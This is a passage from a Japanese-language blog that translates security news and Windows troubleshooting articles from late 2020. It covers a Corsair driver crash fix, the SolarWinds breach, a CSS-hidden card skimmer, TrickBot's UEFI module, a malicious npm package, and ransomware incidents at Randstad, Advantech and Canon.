list vol とタイプし、Enterを押す。これで、ドライブレターのリストと各ドライブのパーティション サイズを確認できるはずである。通常のC:\ドライブとサイズが一致するドライブレターを探し、そのドライブレターを書き留める。
8 、 
exit と入力し、Enterを押し、Diskpartユーティリティを終了する
9 、 C:ドライブに関連付けられているドライブに変更する。例えば、上図に示したdiskpartでは、そのドライブレターは、D である。コマンドプロンプトで、
D  を入力し、Enterを押す。【訳注】 上図のVolume 1 C System Reseは、system-reserved (システムで予約済み領域)なので、ここで選択するドライブではありません。
10 、 新しいドライブに切り替わったら、
dir とタイプし、Enterを押す。Windowsフォルダがあったら、あなたは正しいドライブ中に存在している
11 、 ここで、
cd \windows\system32\drivers とタイプし、Enterを押す。注意: コマンドラインの、cdと\windowsの間には半角スペースを入力する。
12 、 現在、[drive-letter]:\Windows\system32\driverプロンプトになっているはずである。このプロンプトで、
ren corsairvbusdriver.sys corsairvbusdriver.sys.bak  とタイプし、Enterを押す。下図のようになる。
13 、 ドライバをリネームした時にエラーが発生しなかった場合には、
exit と入力し、Enterを押す。これで、コマンドプロンプトが終了する。
14 、 コンピュータを再起動するために
続行(Continue) オプションをクリックし、Windows 10をブートする。
15 、 Windows 10にログインしたら、Corsair Utilityソフトウェアをアンインストールしなさい。
 
方法2、 回復環境(Recovery Environment)を使用してこのドライバをアンインストールする 
 BleepingComputerのメンバーは、これらのクラッシュを解決する方法に関する詳細なステップを親切にも作成し、それを
我々のフォーラムに投稿 している。私は、コマンドプロンプトに精通していない人々がより理解しやすいように、このステップを多少修正した。
 Windows 10 CorsairVBusDriver.sys BSODを解決するには、以下のステップに従いなさい。
1 、 これらのステップを実行するためにWindowsインストールディスクを必要としない。代わりに、Windows 10組み込みのリカバリ コマンドプロンプトを使用して実行することができる。
 
1-1 、 Windows 10リカバリ スクリーンでブートする(ブート方法は
こちら (リンクはMicrosoftの日本語サイトに変更)を参照、但し、「スタートアップ設定」ではなく「コマンドプロンプト」を選択する)。【訳注】 ブート情報や詳細な画像が必要な方は、
こちら や
こちら を参照してください。
 1-2 、 「その他の修復オプション」をクリック1-3 、 「トラブルシュート」をクリック1-4 、 「詳細オプション」をクリック1-5 、 「コマンドプロンプト」をクリック
 
2 、 コマンドプロンプトに入ったなら、Windows System Partitionをマウントする必要がある(これは自動的にマウントされない)
 2-1 、 コマンドプロンプトで、diskpart とタイプし、Enterを押す2-2 、 list disk とタイプし、Enterを押す。これで、サイズと共に幾つかのディスクの出力結果を見るだろう。通常、システムドライブは、Drive 0 である。あなたはドライブのサイズで大体推測がつくだろう。
 2-3 、 select disk x と入力し、Enterを押す。x  は、ステップ2-2の結果で判別されるシステムドライブの値で置き換えなさい。2-4 、 list part とタイプし、Enterを押しパーティションのリストを確認する。通常のWin 10インストールは、4つのパーティションを持っている。パーティション: 1 - Recovery, 2 - System, 3 - Reserved, 4 - Primaryである。あなたがPrimaryパーティションを発見できないのであれば、ステップ2-3に戻り、diskを変更しなさい。あなたがPrimaryパーティションを発見するまで、この操作を繰り返しなさい。2-5 、 Select part x  とタイプする。x  は、あなたのPrimary Partitionの値(ステップ2-4で最大のパーティションのはずである)で置き換えなさい。2-6 、 assign letter=Z とタイプし、Enterを押す。これで、Primary Partitionにドライブレター(Z)が割り当てられる。2-7 、 exit とタイプし、Enterを押す。これで、diskpartが終了する。
 
3 、 ここで、dismコマンドを使用して、この危なっかしいドライバを削除する必要がある。
 3-1 、 dism /Image:Z: /Get-Drivers | more を実行しインストールされているドライバのリストを表示する。これを実行すると、メモ帳が開きドライバリストが表示される。Ctrl+Fを使用して(検索ボックスが開く)探しているドライバを発見し、Published Name(oemxx.infのはずである)をメモする。3-2 、 dism /Image:Z: /Remove-Driver /Driver:oemxxx.inf を実行する。コマンドラインのoemxxx.infは、ステップ3-1でのPublished Nameである。
 
4 、 
exit とタイプし、Enterを押す。これでコマンドプロンプトが終了する。コンピュータを再起動し願いを込めなさい。
 
 他のユーザは、こと特別な情報を指摘している。
・ 「CorsairVBusDriver.sysドライバのインスタンスが複数あるかもしれないことを追加しておく。一つだけに気を配らないように(理解するのに時間がかかった)。」 
 問題が発生した場合や更なる支援を必要とするのであれば、
このフォーラムトピック で様々な提案を読んだり、支援の要請を行うことができる。
MicrosoftはSolarWindsハックでセキュリティ侵害されたことを確認した、他の感染は否定 
 BleepingComputer : News>Security(2020/12/17) 
 Microsoftは、最近SolarWinds攻撃ででハッキングされたことを認めたが、彼らのソフトウェアが、顧客に感染するためのサプライチェーン攻撃でセキュリティ侵害されたことは否定した。
 先週末、
ロシアの国家支援ハッカーがトロイ化させたSolarWindsでセキュリティ侵害 し、クライアントにバックドアを配布するために、Microsoftの自動アップデートを使用していたことが発見された。
 この悪意あるソフトウェアは、Solarigate (Microsoft)あるいはSunburst (FireEye)として追跡されているバックドアであり、およそ18,000の顧客(U.S. Treasury(米国財務省), US NTIA(米国国家電気通信情報管理庁), the U.S. Department of Homeland Security(米国国土安全保障省)を含む)のインフラストラクチャに到達している。
 今夜、ロイターは、その
レポート で、情報筋によると、MicrosoftがSolarWindsサプライチェーン攻撃でセキュリティ侵害されただけでなく、彼らのソフトウェアもまた、その顧客に悪意あるファイルを配布するために改竄されたことを示していると述べている。
 Frank Shaw(Microsoftの広報担当副社長)の
Tweet で、Microsoftは、現在発見されていることに基づいて、このレポートを否定した。Shawは、Microsoftが彼らの環境中に悪意あるSolarWindsバイナリを検出したことを認めたが、彼らのシステムは顧客をセキュリティ侵害するために使用されてはいないと述べている。
 BleepingComputerは、Microsoftにコンタクトし更なる質問をしたが、現時点で、その回答を受け取っていない。
クレジットカード情報を盗み取るスクリプトはハッキングされたオンラインストアのCSSファイル中に隠されていた 
 BleepingComputer : News>Security(2020/12/09) 
 クレジットカード情報を盗み取るスクリプト(以降、クレジットカードスティーラ)は、進化しており、新しい隠蔽戦略に起因して検出することの困難さが増大している。最新の例は、セキュリティ侵害された店舗のページ中に紛れ込ませ、顧客の個人情報や支払い情報を盗むためにCSSコードを使用するWebスキマーである。
 CSSコード中に、彼らの支払い情報スティーラを隠すことによって、このスキマーの作成者達は、自動化されたセキュリティスキャナーによる検出をバイパスし、手動セキュリティコード検査で検証される時でさえ、あらゆるフラグを立てることを成功裏に回避している。
 これは、(セキュリティ)スキャナが一般的に、悪意あるコードに関してCSSファイルをスキャンしないことと、スキマーのトリガースクリプトがCSSページのカスタムプロパティ(変数)を読み込んでいることに、誰も見向きもしていなかったために発生している。
 
CSS (Cascading Style Sheets)ファイルは、ルールのコレクションを使用しているWebドキュメントに対して、スタイル(例、フォント、色、スペース)を追加するための能力をWebサイトに提供するファイルである。
CSSコード中に格納されているMagecartスクリプト リンク 
 クレジットカードスキマー(
Magecart スクリプトとしても知られる)は、オランダのサイバーセキュリティ企業Sansecの研究者によって、火曜日に3つの異なるオンラインストアで発見された。
 このWebスキマーは、SanSecがBleepingComputerに告げた今朝、少なくともひとつのストアで依然としてアクティブであったが、この企業は、このデータの重要な本質に起因する追加情報を共有していない。
 このマルウェアは明るみに出されたが、CSSベースのWebスキマーは、悪意あるスクリプトを挿入し、顧客の支払いカード情報を密かに抽出するために、徐々により高度なテクニックを「実験」することを開始したMagecartグループによって使用されてきた。
 このMagecartスクリプトは、セキュリティ侵害されたEコマースの顧客が支払い情報や個人情報の入力を開始した場合にのみ実行される。
 この買い物客達が注文フォームの確認ボタンを押した時、彼らは攻撃者の悪意あるCSSコードをロードされ解析される新しいページにリダイレクトされる。
 ハッキングされたオンラインストアの確認ページ上のJavaScriptパーサーもしくはトリガー スクリプトは、次に、ハッカーによって制御されている cloud-iq[.]net サーバ上のMagecartスクリプトを指し示す --script変数中のCSSコードに格納されているURLからスキマーをロードし実行する(【訳注】 上図参照)。
 この作戦は、これまでの方法では発見されないので、Magecartグループがセキュリティ侵害されたEコマースWebサイト上で丸見えにならないように彼らのクレジットカードスティーラを隠すことを可能にする。
 今週初めSansecが、これを発見したのは偶の偶然によって警告フラグをあげたのだろう。
コードの全てのビットは悪意ある目的のために使用される 
 オンラインストアは、「実行資産だけでなく、彼らのデータの全てをモニターする必要がある」と、SansecはBleepingComputerに述べている。
 「これは、Eコマースマネージャにとっては、とても頭が痛いものである。今日はCSSだが、明日は、何処か他所の静的なデータであるだろう」
 クレジットカードスキマーとして知られるJavaScriptベースのスクリプトが、セキュリティ侵害されたEコマース サイトのページ中に挿入されて、顧客の支払い情報と個人情報を抽出するMagecart攻撃に対する防御のオプションを、オンライン買い物客は殆ど持っていない。
 「消費者は、夫々の取引に二要素認証を強制する銀行を選択すべきである」と、更に「これは、ヨーロッパにおいては大変一般的であるが、米国ではそうではない」と、Sansecは述べている。
 あなたが米国にいるのであれば、http://privacy.com(【訳注】 使い捨てバーチャルカード決済に関しては、
こちら 参照)や類似のプラットフォームで一時的なカード番号を取得するか、各取引にバーチャルカード(【訳注】 バーチャルカードのメリット・デメリットは
こちら )を使用することができる。
 Sansecの研究者達は最近、SVGソーシャルメディアボタンとして
非表示にできるWebスキミングマルウェア と、永続的なバックドアを同梱している
クレジットカード スティール マルウェアを削除することは、殆ど不可能 であることを発見した。
総合人材サービス会社Randstadが身代金要求型マルウェアに攻撃され重要なデータを盗まれた 
 Graham Cluley : News(2020/12/07) 
 世界最大級の総合人材サービス会社の一つが、それ自身で身代金要求型マルウェアの犠牲者になっていることを発見した。
 先週の木曜日に公開された
ステートメント において、Randstad(ランドスタッド)は、そのネットワーク上に「悪意ある挙動を最近確認した」と発言している。
 その悪意ある挙動は、Egregor身代金要求型マルウェアであった。そして、Randstadは、このセキュリティ侵害によって、操作は損なわれていないと発言しているが、ハッカーが重要なデータにアクセスし、その後、公開したことは認めている。
「これまでの調査で、Egregorグループが、我々のグローバルIT環境および特定のデータ(取り分け、米国、ポーランド、イタリア、フランス)に対して非認証で不法なアクセスを取得していたことは明らかである。彼らは現在、そのデータのサブセットであると主張するものを公開している。」 
 Randstadは、38カ国に38,000人を超える従業員を雇用しており、2019年では、2百万を超える求人者を支援し、28万のクライアント企業と仕事していることを誇りとしている。
 この企業は、「この悲しむべき重大事案を処理するために重要なリソースを捧げている」と発言しているが、より多くのデータを公にリークされることを妨げるために、攻撃の背後にいるサイバー犯罪者によって要求される身代金を支払うのか否かについては共有されていない。
 今年初め、
悪名高いMaze身代金要求型マルウェアの悪漢共が引退 した後、Egregor身代金要求型マルウェアが組織に感染しているとするレポートが急増している。
 Egregor身代金要求型マルウェアの他の最近の犠牲者は、
メトロバンクーバー(【訳注】 カナダのブリティッシュコロンビア州南西部にある地方行政区の一つ(Wikipediaより))交通システム 、ゲームメーカー
Ubisoft 、南アメリカの小売大手
Cencosud が含まれている。
TrickBotの新しいモジュールは、UEFIファームウェアに感染することを目的にしている 
 BleepingComputer : News>Security(2020/12/03) 
 TrickBotマルウェアの開発者達は、UEFI(Unified Extensible Firmware Interface。【訳注】 オペレーティングシステムとプラットフォームファームウェアとの間のソフトウェアインタフェースを定義する仕様(Wikipediaより))の脆弱性を探る新しいモジュールを作成し、感染したマシンを究極にコントロールできるレベルで攻撃を仕掛けようとする攻撃者の取り組みを実演している。
 UEFIファームウェアへのアクセスで、脅威のアクター(【訳注】 ブラックハットハッカーのような脅威となる行為主体のこと)は、セキュリティ侵害されたマシンに、オペレーティングシステムの再インストールやストレージドライブの置き換えに影響されない持続的有効性を設立することができる。
 このファームウェアに植え付けられた悪意あるモジュール(bootkits、【訳注】 rootkitsの改良版(中小企業情報セキュリティ.comより))は、コンピュータのブートシーケンスの初期段階で、他の物に先立ってロードされるため、オペレーティングシステム上で動作するセキュリティソフトからは不可視になる。
 Bootkitsは、システムのブートプロセス操作を制御することが可能であり、より高いレベルで防御を妨害することができる。このコードは最も早い段階で実行されるため、Secure Bootメカニズム(【訳注】 コンピュータ起動時の安全性を確保するため、デジタル署名で起動するソフトウェアを検証する機能。UEFI(BIOS)の機能として提供され、OSに関係なく利用できる(IT用語辞典より))は、このファームウェアが無傷であることが前提であるため、助けにならない。
 脅威のアクターにマシン上にこの種の永久的な存在を取得されることに関連する影響は、膨大であり、TrickBotの場合は尚更である。TrickBotの一日平均の感染数は数千に上る。
Intelプラットフォームをターゲットにしている 
 本日の共同報告書において、サイバーセキュリティ企業Advanced Intelligence (
AdvIntel 、【訳注】 米国の詐欺対策を専門とする企業(WatchGuardより)) とハードウェアとセキュリティ企業
Eclypsium の研究者達は、TrickBotの新しいコンポーネントの技術的詳細を提供した。
 TrickBotは、この段階で偵察衛星のように振る舞い、感染したマシンのUEFIファームウェア中の脆弱性をチェックする。現時点では、この確認はIntelプラットフォーム(Skylake, Kaby Lake, Coffee Lake, Comet Lake)だけを標的にしている。更に、このモジュールはまた、読み込み、書き込み、ファームウェアを削除するコードを含んでいるので、重要なダメージを与えるために使用される。
 このモジュールは、
RWEverything (システムのBIOS/UEFIファームウェアを格納しているSPIフラッシュメモリのようなハードウェアコンポーネントにアクセスができるフリーのユーティリティ)のRwDrv.sysドライバを使用して、UEFI/BIOS書き込み保護がアクティブであるか否かをチェックする。
 このツールの名前に心当たりがあるのは、APT28(Fancy Bear, Sednit, Strontium, Sofacy)として知られるロシアのハッカーの攻撃において、オンライン上で最初に発見されたUEFIルートキットであり、
LoJax によって使用されたからである。
 「SPIフラッシュチップに格納されているUEFIファームウェアに対する全てのリクエストは、IntelプラットフォームのPlatform Controller Hub (PCH)の一部であるSPIコントローラを経由する。このSPIコントローラは、アクセス コントロール メカニズムを含んでいる。これは、SPIフラッシュメモリチップ中に格納されているUEFIファームウェアの非認証セキュリティ侵害を防ぐためにブートプロセスの間ロックされる。」 共同レポート(Eclypsium , AdvIntel )より。 
 
 BIOS/UEFI書き込み保護は、最新システム上で利用可能であるが、この機能はしばしば、アクティブでなかったり、間違って設定されているために、攻撃者がこのファームウェアをセキュリティ侵害したり、あるいは、デバイスを操作不能にすることが可能である。
 この研究者達は、10月19日に、このモジュールを発見し、配備されるこのボットネットの機能と名前をもじって、TrickBotと名付けた。
 Advanced Intelligenceが解析したサンプルで、この研究者達は、新しいTrickBotのサンプルに“user_platform_check.Dll”ファイルに関連付けられた名前“PermaDll”を発見した。
 Eclypsiumでのこのファイルの調査は、この脅威のアクターが、セキュリティ侵害したシステムにシングルチップ チップセット(【訳注】 一つの集積回路上に演算・記憶などのすべての機能をまとめたチップセット(コトバンクより))をチェックするメカニズムを実装していたことを明らかにした。
 研究者達は、このモジュールの役割がPCHクエリを実行し、システム上でPCHを実行する特定のモジュールを決定し、従って、プラットフォームを同定することであること発見した。この情報はまた、攻撃者がそのプラットフォームに脆弱性があるか否かをチェックすることを可能にする。
 この研究者達はまた、このアクターが既知のファームウェア脆弱性攻撃の関数と、以下の目的のために
fwexpl と呼ばれるライブラリに依存していることを発見した。
・ ハードウェアのIOポートからデータを読む
 この研究者達は、TrickBotがLook UPテーブルに存在していないプラットフォーム上で実行されている場合、ハードウェアアクセスを要求する操作のDefault値のpre-Skylakeセットで関数をアクティベートしていると記している。
 プラットフォームを同定した後、TrickBotは、フラッシュメモリ(SPIBAR, PRO-PR4)とBIOSコントロール(BC - ハードウェアレベルでのBIOSアクセスするための書き込み保護ロック ビットを含む)のためのレジスタを読み込むための関連するパスにアクセスする。
 BIOS書き込み保護を無効にしようとする関数中の興味ある発見は、BIOS Write Protection Disableビットが設定されているか否かをチェックするためのBIOS Controlレジスタ中で、間違ったオフセットから読み込むバグを含んでいることであった。
 このコードの結果は、書き込み保護がアクティブであると判断し、それを無効化しようとする。
主たる影響 
 このようなモジュールを開発しているTrickBotは、このアクターがセキュリティ侵害したシステムの支配を拡張するための努力をしていることを明瞭に示している。このボットネットは既に、このアクターが多くの脆弱性のあるターゲットから選択した数千のマシンを感染させている。
 AdvIntelのテレメトリ(遠隔情報収集)は、10月3日から11月21日までのTrickBotによる一日の感染数の最大値は40,000であり、一日の平均感染数は200から4000であることを示している。これらの数値は、ゲートウェイのIPアドレスを使用して外部と通信しているプライベートネットワーク上のコンピュータを計算していないため控えめな数値である。
 最も利益をあげられる犠牲者の選択は、犠牲者のネットワーク、ハードウェア、ソフトウェアから情報を抽出する偵察スクリプトを介して引き出されるデータに基づいて手動で実行されている。
 このオペレータ達は経済的な動機を持っており、ボットネットを使用してRyukやConti身代金要求型マルウェアを高い利益をあげられるマシンに配布している。2018年以来、彼らは少なくとも1億5000万ドルを得ている。最近1人の犠牲者だけから、彼らは
2,200BTC(現時点で3400万ドルの価値)を奪っている 。
 TrickBotは、銀行詐欺や金融/個人情報の盗難を含む、複数の金儲け計画に関与している、当にサイバー犯罪企業である。
 高価値のマシン上にUEFIレベルの持続的有効性を獲得すると、彼らは幾つかの方法でこの有利の地歩を使用することができるので、アクターの利益を最大化することができる。
 身代金の引き上げ交渉における影響力として、UEFIインプラントの使用とは別に、サイバー犯罪者は、犠牲者がシステムをTorickBotのコントロールから切り離すために身代金を支払った後でさえ、マシンにアクセスすることができる。
 後に、犠牲者がクリーニングとリカバリプロセスを完了したあとでも、この攻撃者はUEFI中に継続して存在している有利の地歩を利用して、新しい攻撃を実行することができる。攻撃者達はまた、アクセス認証情報のセットを収集し、他の悪漢共に販売することもできる。
 これは、大規模運用環境と重要なインフラストラクチャに影響を与えるので、純粋に破壊を目的とする作戦に使用することができるだろう。デバイスを操作不能にする他の効果は、法医学的調査を大変困難にし、リカバリプロセスを大幅に遅くし、セキュリティの他のレイヤーを破壊することである。
厳しい防衛行動 
 Eclypsiumの主任研究員Jesse Michaelは、システムがUEFIファームウェア レベルでセキュリティ侵害されているか否かを決定することは、大変困難な仕事であるとBleepingComputerに告げている。
 より徹底的な方法として、SPIフラッシュ プログラミング デバイスを物理的に接続することによって、システムをパワーダウンした時に、SPIメモリチップ上のコンテンツを読み込むことである。しかしながら、この解決策は、専門知識だけでなく、チップがマザーボードに半田付けされている場合には、その企業のダウンタイムが長くなるし、読み込み問題のリスクがある。
 他の方法は、オープンソースツール(
CHIPSEC )もしくは、ハードウェアやファームウェアでローレベルの弱点を調査し、BIOS書き込み保護がアクティブか否かを決定することもできるEclypsiumのプラットフォームを使用することである。
 ファームウェアのハッシュをチェックすることは、このコードが改竄されているか否かを決定する助けになる。更に、ファームウェアをアップデートすることは、必ず既知の脆弱性の影響を受けなくなるので適切な方法である。
 UEFIレベルのセキュリティ侵害は、Hacking TeamのVectorEDK UEFIインプラント コードがリークされ、公に利用されるようになって以来5年以上経つ今日でさえ稀である。
 現時点で、この種の公に確認された攻撃は、VectorEDKコードを使用する非常に高度なもの(ロシアのハッカー集団Lojaxや中国のハッカー
MosaicRegressor のような国家をバックに持つ脅威のアクター)から出現している。
 しかしながら、可能な限り多くのシステムに感染し、そのプール(【訳注】 ある目的のためにデータを格納するために確保される記憶装置の部分(コンピュータ用語辞典より))から利益をあげられるターゲット(あらゆる分野の大企業)を選択することを目的とするTrickBotとは異なり、これらの敵からの攻撃は、大変標的化されている。
 TrickBootのサンプルの解析から、このモジュールは、ハードウェアを同定し、BIOS領域が書き込み可能か否かをチェックするだけである。しかし、これは、SPIフラッシュメモリへの書き込みや、システムファームウェアの改竄を可能にするために簡単に変更することができる。
 
AdvIntel と
Eclypsium からの技術レポートは、この新しいモジュール用に
Vitali Kremez によって作成されたYaraルール(【訳注】 オープンソースのマルウェアの検知・解析ツール「YARA」で使用される記述形式で、マルウェアの特徴を記述するもの(ZDNetより))と共に、TrickBootに関するセキュリティ侵害の痕跡を提供している。
悪意あるNPMパッケージがnjRATリモートアクセス・トロイをインストールするために使用されている 
 BleepingComputer : News>Security(2020/12/01) 
 新しい悪意あるNPMパッケージが発見された。これは、ハッカーがコンピュータのコントロールを奪うために、njRATリモートアクセス・トロイをインストールするものである。
 NPMは、開発者やユーザがパッケージをダウンロードし、それらをプロジェクトに統合することを可能にするJavaScriptパッケージマネージャである。
 NPMはオープンエコシステムなので、誰もが、マルウェアに関する検証やスキャンを実行されることなく新しいパッケージをアップロードすることができる。この環境は、100万の豊富で多様なパッケージのリポジトリをきたしたが、この環境はまた、脅威のアクターが悪意あるパッケージを簡単にアップロードすることもできる。
njRATをインストールする悪意あるNPM 
 本日、オープンソース・セキュリティ企業Sonatypeは、悪意あるNPMパッケージがJSONファイルから作成された合法なツールであるかのように装っていることを
発見した 。
 これらのパッケージは、'jdb.js'とか'db-json.js'と呼ばれていた。このファイルは、NPMによって削除されている。しかし、以下のスクリーンショットから確認できるように、それらは、プロジェクトに新しい機能を追加するために使用することのできる無害のパッケージのように見える。
 db-json.js用のpackage.jsonファイルから確認できるように、依存関係として、'jdb.js'と呼ばれる他のパッケージを含んでいる。このpackage.jsonファイルは、db-json.jsパッケージをインストールする時に、NPMに自動的にそのパッケージ(jdb.js)をインストールさせる。
 jdb.jsパッケージは、以下に示したようにmodule.js, package.json, 
patch.exe実行ファイル を含んでいる。インストールされると、インストール時に自動的に起動するように設定されているため、NPMは自動的にmodule.jsを自動的に実行する。
 以下に見られるように、このJSスクリプトは、強く難読化されているが、pach.exe実行ファイルを起動する。これは、njRATマルウェアである。
 インストールされると、njRATは、脅威のアクターに犠牲者のコンピュータに対する完全なリモートアクセスを与える。そこで、以下の悪意ある挙動を実行することができる。
・ Windowsレジストリを改竄する
 以下の画像で、あなたは、njRATを介して脅威のアクターが送信できるコマンドの一部を示しているソースコードの断片を見ることができる。
 各パッケージは夫々、凡そ100回ダウンロードされているが、SonatypeのAx Sharmaは、悪意のあるNPMが十分に活用される前に捕まえたと信じていると、BleepingComputerに語った。
 この一年間、マルウェアをインストールする、あるいは、悪意ある挙動を実行するNPMパッケージを発見することは一般的に増加傾向にある。
 最近、NPMは、
Discord(【訳注】 ビデオ通話・音声通話・VoIPフリーウェア(Wikipediaより))トークンを盗ん だり、Google Chrome, Brave Browser, Opera, Yandex Browserからブラウザ情報を盗むために使用されていることを発見した後、'fallguy'や'discord.dll' という悪意あるパッケージを削除した。
 悪意あるNPMプロジェクトは、合法なプロジェクトに似た名前を付けるのが一般的になっているので、開発者は、彼らのプロジェクトに統合するパッケージに詳細な注意を払わなければならない。
バグだらけのWindows 10機能更新プログラムを元に戻すための時間を拡張する方法 
 BleepingComputer : News>Security(2020/11/29) 
 Defaultで、Microsoftは、ユーザに新たなWindows 10機能更新プログラムをアンインストールし、オペレーティングシステムを直前の状態に戻す期間を10日に設定している。
 この記事では、OSのアンインストール・ウィンドウを使用して、新しいWindows 10機能更新プログラムのテスト期間を増やす方法を示す。
 新しいWindows 10機能更新プログラムをインストールした後に、バグ、パフォーマンス問題、クラッシュが発生し、このバグ群が修正されるまで、機能更新プログラムをアンインストールすることが要求されるのは毎度のことである。
 Windows 10を直前のバージョンに戻すには、スタート > 設定 > 更新とセキュリティ の下に発見されるリカバリ(回復)画面に進む。そこで、「前のバージョンの Windows 10 に戻す」の下にある「開始する」ボタンをクリックすることで、直前のバージョンに戻すことができる。
 Windows 10機能更新プログラムをインストール後、10日以上経過しているのであれば、「開始する」ボタンは以下に示すようにグレーアウトしているだろう。そして、この機能更新プログラムを削除することはできない。
 Windows 10の新しいバージョンをアンインストールする時間を増やしたい人は、コマンドラインツールであるDeployment Image Servicing and Managementツール(DISM.exe、展開イメージのサービスと管理) を使用することができる。
Windowsの機能更新プログラムのアンインストール期間を増やす方法 
 先述したように、あなたが新しい機能更新プログラムをインストールした後、OSを直前のバージョンに戻すための時間を、Microsoftは10日に設定している。
 
管理者権限でのコマンドプロンプト から、以下のDISMコマンドを使用して、アンインストール設定の値を検索することができる。
DISM /Online /Get-OSUninstallWindow 
 以下に示したように、BleepingComputerが、この新しい機能更新プログラムをインストールした後、アンインストール期間は、Defaultの10日に設定されていた。
 Windows 10機能更新プログラムをアンインストールする日数を増やすには、DISMを 
/Set-OSUninstallWindow  引数付きで以下の書式で実行する。
DISM /Online /Set-OSUninstallWindow /Value:[days] 
 OSをアンインストールする日数は、2から60日である。2より少なく、60より大きな値を指定した場合は、アンインストールの日数はDefaultの10日に設定される。
 例えば、OSをアンインストールする日数を59日に設定したいのであれば、以下に示したように、
DISM /Online /Set-OSUninstallWindow /Value:59  コマンドを実行しなさい。
 大多数の人々は、この設定を変更する必要はないし、10日間は、Windows 10の新しいバージョンを使用するか否かを決定するには十分な時間である。
 クリティカルタスク(【訳注】 プロジェクトの全工程を線で結んだ時に最長となる経路上に存在している作業)を実行しているコンピュータや、近い将来にハードウェアのアップグレードを計画している場合には、アンインストールの期間を増やすことは、新しい機能更新プログラムやハードウェアの変更をテストする時間が十分に取れるので、賢明なことかも知れない。
 このように、何らかの問題が発生した場合、簡単にこの機能更新プログラムをアンインストールし、バグの修正がリリースされるのを待って、再びアップグレードすることができる。
IIoTチップメーカーAdvantechが身代金要求型マルウェア攻撃され、身代金1250万ドルを要求されている 
 BleepingComputer : News>Security(2020/11/28) 
 Conti身代金要求型マルウェアの悪漢共は、産業オートメーションと産業IoT(IIoT)のチップメーカAdvantech(【訳注】 台湾のマザーボードおよび産業用向けコンピューターメーカー(Wikipediaより))を攻撃し、影響を受けたシステムを復号するために1400万ドルの身代金を支払えば、盗んだ企業データのリークを停止するとしている。
 Advantechは、世界中の92の大都市に8000人を超える従業員を抱える、IT製品とソリューション(組込コンピュータ、ネットワークデバイス、IoT、サーバー、ヘルスケア・ソリューションを含む)産業の世界的企業である。
 この企業は2018年には世界の市場占有率34%を占める世界の産業用コンピュータのリーダーであり、2019年では、年間売上高17億ドルと報告されている。
身代金は750Bitcoinに設定されている 
 BleepingComputerが確認したチャットのログによると、Advantechネットワーク攻撃の背後にいるContiのオペレータは、全データを復号し、Advantechのサーバから盗んだデータを削除するための身代金を750BTC(本日の換算レートで約$12,600,000)に設定している。
 Contiはまた、彼らの復号操作がキチンど動作することの証明として、身代金を支払う前に二つの暗号化されたファイルを復号する意思があると発言している。
 この身代金要求型マルウェアのオペレータは、2020年11月21日に、翌日までにAdvantechから対応がない場合には、盗んだデータの一部をリークすると追加している。
 11月26日、このグループは、
ransomware data leakサイト でAdvantechのデータを3.03GBのアーカイブとして公開することを開始した。このZIPアーカイブには、盗まれたデータの2%と、ファイルのリストが付属するテキストドキュメントが含まれている。
 この身代金要求型マルウェアの悪漢共はまた、身代金が支払われた場合には、即座にこの企業のネットワークに配備した全てのバックドアを削除し、更なるセキュリティ侵害を防止するためのネットワークを安全にする方法に関するセキュリティ上のヒントを提供すると宣言している。
 彼らはまた、支払いが実行されたなら、盗んだ全てのデータは削除されると発言しているが、身代金要求型マルウェア攻撃との交渉企業Covewareの研究者は、身代金を支払ったところで、一部の身代金要求型マルウェア攻撃作戦は、
実際にはファイルを削除していない と述べている。
 この企業は、彼らのシステムに対する身代金要求型マルウェア攻撃の有無に関して何ら声明を公に発行していないが、BleepingComputerは、ContiのオペレータがAdvantechの暗号化されたシステム上に残した脅迫文のコピーを入手した。
 Advantechの広報担当者は、本日までBleepingComputerによる問い合わせに対して、即座にコメントできていない。
Conti身代金要求型マルウェア 
 Conti身代金要求型マルウェアは、2019年末に分離攻撃で最初に発見され、2020年6月この攻撃は増加した。
 この身代金要求型マルウェアは、
悪名高きRyuk身代金要求型マルウェア とコードを共有し、2020年7月にRyukの活動が減少した後、トロイの木馬TrickBotによって開かれたリバースシェル(【訳注】 ターゲット端末から攻撃端末に対して接続する方法(Qiitaより))を介して配布され始めた。
 Contiオペレータは、企業ネットワークをセキュリティ侵害し、彼らがデバイスの暗号化に使用する身代金要求型マルウェアのペイロードを配備することが可能なドメイン管理者の認証情報にアクセスできるまで、横方向に拡散する。
 Contiは、経験豊富なハッカーを募集している。これは巨額の身代金の分け前と引き換えに身代金要求型マルウェアを配備するプライベートRansomware-as-a-Service(RaaS、【訳注】 身代金要求型の不正プログラムであるランサムウェアをサービスとして取引するビジネスモデルのこと(Tokio Cyber Portより))作戦のためである。2020年8月mContiは、26人の犠牲者で
独自のデータ漏洩サイト を開設した。
米国Canonは身代金要求型マルウェア攻撃を受け、データが盗まれたことを認めた 
 BleepingComputer : News>Security(2020/11/26) 
 Canonは、8月初めの身代金要求型マルウェアによるサイバー攻撃で、ハッカーに、この企業のサーバからデータを盗まれたことを最終的に公に認めた。
 BleepingComputerは、クラウドの写真とビデオのストレージサーバ(image.canon)に、ユーザのファイルが失われる疑わしい休止状態を追跡した後、この攻撃に関して
最初にレポート した。
盗まれた従業員データ 
 8月5日、Canon USAは、広範なシステムの問題を従業員に通知した。これは、複数のアプリケーション(Teamsとその中での電子メール)が利用できなくなったとするものであった。
 BleepingComputerによる脅迫文の部分的なスクリーンショットは、この休止状態が、Maze身代金要求型マルウェア(一般的に改竄されたネットワークから盗まれたデータを利用して、犠牲者に支払い圧力をかけるグループ)によって発生させられたことを示している。
 Canonは、この重大事案の調査を開始し、7月20日から8月6日の間に、彼らのネットワーク上に未認証の活動があった証拠を発見した。
 この脅威のアクターは、2005年から2020年の間の現在と過去の従業員と、彼らの受益者と扶養家族に関する情報をホストしていたファイルサーバにアクセスしている。
 水曜日の
公式アナウンス では、Canonは、この攻撃者によってアクセスされたデータは、従業員名、社会保障番号、誕生日、運転免許証番号、政府発行ID(【訳注】 パスポート等)、Canonから直接振り込まれる銀行口座番号、従業員の電子署名が含まれると発言している。
 この攻撃直後、Maze身代金要求型マルウェアの悪漢共は、8月5日にファイル暗号化マルウェアを実行する前にデータと個人データベースの10TBをCanonから盗んだと、彼らはBleepingComputerに告げている。
 驚いたことに、この攻撃によって発生したimage.canonの問題とCanon USAの一般的な休止状態は無関係であった。Mazeは、彼らの行動がストレージサーバにまで及んでいないと認めている。
 身代金要求型マルウェア攻撃を公に確認するのに3か月かかったが、Canonは、8月6日の内部セキュリティ通知において、このセキュリティ上の重大事案の性質について従業員に対して認めた。
Mazeは、もうこの世にいない 
